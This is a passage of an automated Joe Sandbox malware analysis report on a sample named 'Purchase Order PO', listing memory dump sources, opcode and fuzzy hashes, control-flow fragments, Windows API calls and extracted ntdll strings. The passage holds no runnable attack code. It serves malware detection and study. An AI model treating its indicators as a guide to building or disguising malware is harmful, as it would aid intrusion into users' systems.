                                                                                                                            • Instruction Fuzzy Hash: B142C075A00218DFDB15CFA9C984F99BBB2FF48304F1580EAE609AB265DB31D991DF10
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 94d54d4e5bea62841e275a22216d09c64bb567e8ac5cafbf4b26afd9f3ab0d64
                                                                                                                            • Instruction ID: 683a8839302097dc4aa3fbf77043056a91e1ea7420378a0b3868d78d572608f0
                                                                                                                            • Opcode Fuzzy Hash: 94d54d4e5bea62841e275a22216d09c64bb567e8ac5cafbf4b26afd9f3ab0d64
                                                                                                                            • Instruction Fuzzy Hash: 06E1FCB4E001598FCB14DFA9C5849AEFBF2BF49304F24C16AD415AB356DB31A942CFA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 791aee17a0c841cb502c7975b2050ea42abcb2a06a6bdb843985ad37eb523970
                                                                                                                            • Instruction ID: 6c5940fd9e91238171776620d79e6c6f72e28b114856cfdd1c9f819994fd45b2
                                                                                                                            • Opcode Fuzzy Hash: 791aee17a0c841cb502c7975b2050ea42abcb2a06a6bdb843985ad37eb523970
                                                                                                                            • Instruction Fuzzy Hash: DFE1CCB4E001198FCB14DFA9C5849AEFBB2BF49305F24C15AE415AB35ADB31A942CF61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c1f32147cd6eaa3954346df3fbe70149597a24851f4ac6b603c84bda30e69caf
                                                                                                                            • Instruction ID: bff88c9d1721c4d9e3c1878f0357927a6868cf31ae71ad27a9ead1f02158f2d6
                                                                                                                            • Opcode Fuzzy Hash: c1f32147cd6eaa3954346df3fbe70149597a24851f4ac6b603c84bda30e69caf
                                                                                                                            • Instruction Fuzzy Hash: A3E1DBB4E001598FCB14DFA9C6849AEFBB2FF89304F24C15AD415AB356DB31A942CF61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0818a521b36535ab6406676214ae7f9527ffc3a1315f19de49f3595224698c95
                                                                                                                            • Instruction ID: a1a2202bf54a97965a3b52a3e836b91232b4127f40f313b4ca0988a310dcdded
                                                                                                                            • Opcode Fuzzy Hash: 0818a521b36535ab6406676214ae7f9527ffc3a1315f19de49f3595224698c95
                                                                                                                            • Instruction Fuzzy Hash: FBE1DBB4E001198FDB14DFA9C6849AEFBB2FF89304F24C15AD415AB355DB31A942CF61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2da645db7db3b5f110733eb3f45f924e9f606638aec963a4b9941615141aade0
                                                                                                                            • Instruction ID: 3e02f092934f4de5c036ef839f371b9738034ab2fa93c561c4552fada5569ca7
                                                                                                                            • Opcode Fuzzy Hash: 2da645db7db3b5f110733eb3f45f924e9f606638aec963a4b9941615141aade0
                                                                                                                            • Instruction Fuzzy Hash: 598129164AA6F11AE702BF7CEAB12CA7F60DF92225F0904A3C1D48D46B995584CDC2DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0f8d040167c5c101b79f835dce187a6b2e7711772f84bd1ca8898a9935636c2b
                                                                                                                            • Instruction ID: abd4e93cf5ef985fb60b4bb333818543121b935163592d60d1007dab4ea84ff2
                                                                                                                            • Opcode Fuzzy Hash: 0f8d040167c5c101b79f835dce187a6b2e7711772f84bd1ca8898a9935636c2b
                                                                                                                            • Instruction Fuzzy Hash: 64D10731D2065A8ACB00EF68D994ADDB7B1EFD5300F10979AE0093B625EF706AC9CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 01dbd2506d6828abcc096fb0263c8ed14b58488aa932accfdf5bb68dee35096d
                                                                                                                            • Instruction ID: 4cbeabe58a693b04c87d6006074921a6779b1afcbdb665df464bf19194d16f87
                                                                                                                            • Opcode Fuzzy Hash: 01dbd2506d6828abcc096fb0263c8ed14b58488aa932accfdf5bb68dee35096d
                                                                                                                            • Instruction Fuzzy Hash: D9A18136F00206CFCF19DFB8C48059EBBB2FF84705B1545AAE915AB265DB35D916CB80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 66d4ed4df7113e23992071679f8375cf31ecba8c5c01ff4628fbc3376483be4c
                                                                                                                            • Instruction ID: 2c9486aaaa30d47e3ac730172a5b1fa3521581c0f56fa9ae21394bce6e725377
                                                                                                                            • Opcode Fuzzy Hash: 66d4ed4df7113e23992071679f8375cf31ecba8c5c01ff4628fbc3376483be4c
                                                                                                                            • Instruction Fuzzy Hash: 59D1F731D2065A8ACB10EF68D994ADDB7B1EFD5300F10979AE0093B625EF706AC9CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9db34abd126ea16c9c0fbf5057c4322bce165652fd7247b88ea70a6e71b912f0
                                                                                                                            • Instruction ID: dd09878ab7ee766252e8090b98ea34be46a68a47f0d3fdb45a0257b4f1315e9b
                                                                                                                            • Opcode Fuzzy Hash: 9db34abd126ea16c9c0fbf5057c4322bce165652fd7247b88ea70a6e71b912f0
                                                                                                                            • Instruction Fuzzy Hash: 80C1F631D2065A8ACB10EF68D994ADDB7B1FF95300F10979AE0093B625EF706AC5CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2de875251594270dc0a5308863741166a95aa131128214250997c42620e002c1
                                                                                                                            • Instruction ID: cb0e63d700f8e215cfafce0ba58bbcb6e00e8073c926071bf8efa3cc776766ae
                                                                                                                            • Opcode Fuzzy Hash: 2de875251594270dc0a5308863741166a95aa131128214250997c42620e002c1
                                                                                                                            • Instruction Fuzzy Hash: B7E09AB8958118CBCB108F94E4495F8FB7CE75B321F453562E51EA3211D73055928F15
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$Hbq$$^q$$^q
                                                                                                                            • API String ID: 0-3400431855
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                            • API String ID: 0-3001612457

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:1.3%
                                                                                                                            Dynamic/Decrypted Code Coverage:5.1%
                                                                                                                            Signature Coverage:8%
                                                                                                                            Total number of Nodes:138
                                                                                                                            Total number of Limit Nodes:8

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 356 417723-41774c call 42f323 359 417752-417760 call 42f923 356->359 360 41774e-417751 356->360 363 417770-417781 call 42ddc3 359->363 364 417762-41776d call 42fbc3 359->364 369 417783-417797 LdrLoadDll 363->369 370 41779a-41779d 363->370 364->363 369->370
                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417795
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2234796835-0

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 376 42c663-42c69c call 404783 call 42d8c3 NtClose
                                                                                                                            APIs
                                                                                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C697
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3535843008-0

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 390 1ad2b60-1ad2b6c LdrInitializeThunk
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 391 1ad2c70-1ad2c7c LdrInitializeThunk
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostThread
                                                                                                                            • String ID: S$l420377x$l420377x
                                                                                                                            • API String ID: 1836367815-2727433438

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 15 413f93-413fc5 call 42e7e3 call 42f1f3 20 413fcb-413ffd call 404733 call 424e23 15->20 21 413fc6 call 417723 15->21 26 41401d-414023 20->26 27 413fff-41400e PostThreadMessageW 20->27 21->20 27->26 28 414010-41401a 27->28 28->26
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostThread
                                                                                                                            • String ID: l420377x$l420377x
                                                                                                                            • API String ID: 1836367815-444879537
                                                                                                                            • Opcode ID: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                                                                                            • Instruction ID: 33197e0a7dcb6eb663e71045ce9ebb9a0ec692f75d002f1c99a84e6dd662f6bc
                                                                                                                            • Opcode Fuzzy Hash: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                                                                                            • Instruction Fuzzy Hash: 4A0126B2D0025C7AEB10AAE69C81DEFBB7CDF44798F408069FA0467141D67C9E064BB5

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 29 413f72-413f79 30 413fb5-413ffd call 417723 call 404733 call 424e23 29->30 31 413f7b-413f87 29->31 38 41401d-414023 30->38 39 413fff-41400e PostThreadMessageW 30->39 39->38 40 414010-41401a 39->40 40->38
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostThread
                                                                                                                            • String ID: l420377x$l420377x
                                                                                                                            • API String ID: 1836367815-444879537
                                                                                                                            • Opcode ID: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                                                                                            • Instruction ID: 07d8ccd72df32b7def514bcf1009cf5c80a90bfc08a7e37c420c6dc4dd04ca91
                                                                                                                            • Opcode Fuzzy Hash: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                                                                                            • Instruction Fuzzy Hash: 5D0140B3E0005876D7105EA55CC1CEFBB7CDE84754F4040ABFA0497201E66E4E024BA5

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 41 42c9e3-42ca24 call 404783 call 42d8c3 RtlFreeHeap
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CA1F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID: wdA
                                                                                                                            • API String ID: 3298025750-2931128418
                                                                                                                            • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                                                                            • Instruction ID: 9a34639f9b590f445554bb3374e68085bc2f8b1a53e3d8f22fb1199bbd37af40
                                                                                                                            • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                                                                            • Instruction Fuzzy Hash: E6E06D72604205BBD614EF59EC85FAB37ADDFC9714F004419FE18A7242C671B9118AB8

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 371 42c993-42c9d4 call 404783 call 42d8c3 RtlAllocateHeap
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(?,0041E4EE,?,?,00000000,?,0041E4EE,?,?,?), ref: 0042C9CF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                                                            • Instruction ID: 36e320101d405b986edb5f0360d5375c690b058552b8fab17163e86361dfcef2
                                                                                                                            • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                                                            • Instruction Fuzzy Hash: D6E06DB2604204BBD714EE99EC41EAB77ACDFC5750F004419FD18A7282D671B9108BB9

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 381 42ca33-42ca6c call 404783 call 42d8c3 ExitProcess
                                                                                                                            APIs
                                                                                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,5B435AB9,?,?,5B435AB9), ref: 0042CA67
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 621844428-0
                                                                                                                            • Opcode ID: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                                                                                            • Instruction ID: e0f95e071271af0ef5bae3a3abc99ff131e4bcb123f1ba6cdcf3cfbd638433f3
                                                                                                                            • Opcode Fuzzy Hash: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                                                                                            • Instruction Fuzzy Hash: 4CE04F766002187BD220AA9AEC41F97775CDFC9714F50441AFA1867182C6717A1586A4

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 386 1ad2c0a-1ad2c0f 387 1ad2c1f-1ad2c26 LdrInitializeThunk 386->387 388 1ad2c11-1ad2c18 386->388
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: d6770ca066eff0ccce02a38b610614372139a8a3501d59d1847aa34a8f753b72
                                                                                                                            • Instruction ID: 51208426774534202d37fa738632684cee007ab4cf82f1d5bc401608c1fad914
                                                                                                                            • Opcode Fuzzy Hash: d6770ca066eff0ccce02a38b610614372139a8a3501d59d1847aa34a8f753b72
                                                                                                                            • Instruction Fuzzy Hash: 4BB09B719019C5C5DA12E764460C717794077D0701F16C072D2030741F473CC5D1E275
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-2160512332
                                                                                                                            • Opcode ID: 1fc3f134e777ddff8aaef40082b6f72348a25b55a20942295a3cae7fb29a40cd
                                                                                                                            • Instruction ID: bfe61eb9a850fc7a76844b26b25f8119dadf4bd5d7dcc0a7647c429a80330078
                                                                                                                            • Opcode Fuzzy Hash: 1fc3f134e777ddff8aaef40082b6f72348a25b55a20942295a3cae7fb29a40cd
                                                                                                                            • Instruction Fuzzy Hash: 6892CD71604342AFE729DF28C880B6BB7E8FB84710F9549ADFA94D7254D770E844CB92
                                                                                                                            Strings
                                                                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B054CE
                                                                                                                            • 8, xrefs: 01B052E3
                                                                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B0540A, 01B05496, 01B05519
                                                                                                                            • Invalid debug info address of this critical section, xrefs: 01B054B6
                                                                                                                            • Address of the debug info found in the active list., xrefs: 01B054AE, 01B054FA
                                                                                                                            • Critical section address., xrefs: 01B05502
                                                                                                                            • Thread identifier, xrefs: 01B0553A
                                                                                                                            • Critical section debug info address, xrefs: 01B0541F, 01B0552E
                                                                                                                            • undeleted critical section in freed memory, xrefs: 01B0542B
                                                                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B054E2
                                                                                                                            • double initialized or corrupted critical section, xrefs: 01B05508
                                                                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01B05543
                                                                                                                            • corrupted critical section, xrefs: 01B054C2
                                                                                                                            • Critical section address, xrefs: 01B05425, 01B054BC, 01B05534
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                            • API String ID: 0-2368682639
                                                                                                                            • Opcode ID: b5aee963a79406d26dfda9e0afeb974a11ba882f61d92cc4ac15e3d4299170c8
                                                                                                                            • Instruction ID: b45810d56d4faafd99774ed642c09ced548e272a0c262e6cb4ca8ba61636a363
                                                                                                                            • Opcode Fuzzy Hash: b5aee963a79406d26dfda9e0afeb974a11ba882f61d92cc4ac15e3d4299170c8
                                                                                                                            • Instruction Fuzzy Hash: 768189B1A00349BFEB25CF99CC45BAEBBB9FB08B14F104159E505B7690D3B9A940CB60
                                                                                                                            Strings
                                                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01B022E4
                                                                                                                            • @, xrefs: 01B0259B
                                                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01B02624
                                                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01B02498
                                                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01B02602
                                                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01B025EB
                                                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 01B0261F
                                                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01B02506
                                                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01B02412
                                                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01B02409
                                                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01B024C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                            • API String ID: 0-4009184096
                                                                                                                            • Opcode ID: e148ee8ad654b281252402bbadeedf300da25f03d385c8cf6aea7b6e26859ec4
                                                                                                                            • Instruction ID: 9cbc31c0c30c3a6d76e63d09f4b279da0c514291f1d8ca44d9677d48660ee820
                                                                                                                            • Opcode Fuzzy Hash: e148ee8ad654b281252402bbadeedf300da25f03d385c8cf6aea7b6e26859ec4
